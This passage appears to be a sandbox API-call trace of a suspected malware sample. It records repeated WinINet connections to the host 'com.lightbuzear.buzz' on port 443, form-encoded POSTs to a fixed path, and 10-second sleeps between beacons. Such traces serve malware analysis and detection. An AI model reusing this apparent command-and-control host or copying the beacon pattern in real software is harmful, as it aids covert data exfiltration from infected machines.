[0255.768] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800528 [0255.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb898 | out: hHeap=0x4780000) returned 1 [0255.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0255.769] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0255.769] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0255.769] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800528 | out: hHeap=0x4780000) returned 1 [0255.769] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0255.770] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0255.770] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0255.770] FreeLibrary (hLibModule=0x71570000) returned 1 [0255.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0255.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0255.770] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800460 | out: hHeap=0x4780000) returned 1 [0255.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003c0 | out: hHeap=0x4780000) returned 1 [0255.771] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0255.772] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0255.772] Sleep (dwMilliseconds=0x2710) [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5f0 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce710 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5f0 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce600 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c50 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ba8 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c50 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0255.852] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ba8 | out: hHeap=0x4780000) returned 1 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815bd8 [0255.852] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0255.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0255.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0255.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800f28 [0255.853] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0255.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6d0 [0255.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0255.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0255.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce750 [0255.853] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0255.853] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce740 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6d0 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c08 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815b78 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b78 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4801018 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbcf8 [0255.854] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4801018 | out: hHeap=0x4780000) returned 1 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4801018 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd68 [0255.854] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0255.855] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd68 | out: hHeap=0x4780000) returned 1 [0255.855] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0255.856] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0255.856] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0255.856] FreeLibrary (hLibModule=0x71780000) returned 1 [0255.857] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0255.857] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0255.857] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800118 [0255.858] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0255.858] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce640 [0255.858] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce750 [0255.858] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0255.858] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0255.858] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0255.858] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0255.859] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0255.859] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bf0 [0255.859] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c08 [0255.859] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bf0 | out: hHeap=0x4780000) returned 1 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0255.859] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815c68 [0255.859] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003c0 [0255.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003c0 | out: hHeap=0x4780000) returned 1 [0255.860] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0255.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800230 [0255.860] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0255.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800280 [0255.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce680 [0255.860] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce640 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5a0 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815b90 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815ba8 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815b90 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0255.861] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815ba8 | out: hHeap=0x4780000) returned 1 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x4815b90 [0255.861] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48003c0 [0255.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003c0 | out: hHeap=0x4780000) returned 1 [0255.862] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0255.862] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce670 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce640 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6e0 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c08 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c08 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48002f8 [0255.863] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0255.863] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0255.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0255.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800168 [0255.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0255.864] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800140 [0255.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0255.864] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0255.864] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0255.864] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800140 | out: hHeap=0x4780000) returned 1 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5c0 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6a0 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce680 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0255.865] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bf0 [0255.865] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bc0 [0255.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bf0 | out: hHeap=0x4780000) returned 1 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0255.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x48003c0 [0255.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0255.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48003c0 | out: hHeap=0x4780000) returned 1 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800438 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0255.866] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48001b8 [0255.866] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0255.867] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0255.867] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0255.867] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0257.364] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48001b8 | out: hHeap=0x4780000) returned 1 [0257.364] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce710 [0257.364] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce5b0 [0257.365] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce620 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce600 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce600 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce620 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815c98 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815bc0 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800140 [0257.365] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0257.365] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbf28 [0257.366] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800140 | out: hHeap=0x4780000) returned 1 [0257.366] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800208 [0257.366] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0257.366] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800140 [0257.366] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0257.367] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbf28 | out: hHeap=0x4780000) returned 1 [0257.367] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0257.367] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0257.367] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800140 | out: hHeap=0x4780000) returned 1 [0257.368] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce670 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5a0 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce610 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x4815bc0 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce610 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x4815c98 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815bc0 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4815c98 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4800410 [0257.368] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0257.368] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0257.369] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800410 | out: hHeap=0x4780000) returned 1 [0257.369] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4800348 [0257.369] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbd30 [0257.369] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x48002f8 [0257.369] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbd30 | out: hHeap=0x4780000) returned 1 [0257.369] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0257.370] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0257.370] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0257.371] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x48002f8 | out: hHeap=0x4780000) returned 1 [0257.371] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0257.371] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0257.371] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0257.371] FreeLibrary (hLibModule=0x71570000) returned 1 [0257.371] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5b0 | out: hHeap=0x4780000) returned 1 [0257.371] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0257.372] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800280 | out: hHeap=0x4780000) returned 1 [0257.372] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800230 | out: hHeap=0x4780000) returned 1 [0257.372] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800118 | out: hHeap=0x4780000) returned 1 [0257.373] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4800f28 | out: hHeap=0x4780000) returned 1 [0257.373] Sleep (dwMilliseconds=0x2710) [0257.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0257.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0257.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0257.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0257.400] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0257.400] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0257.401] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0257.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce670 [0257.401] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0257.401] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 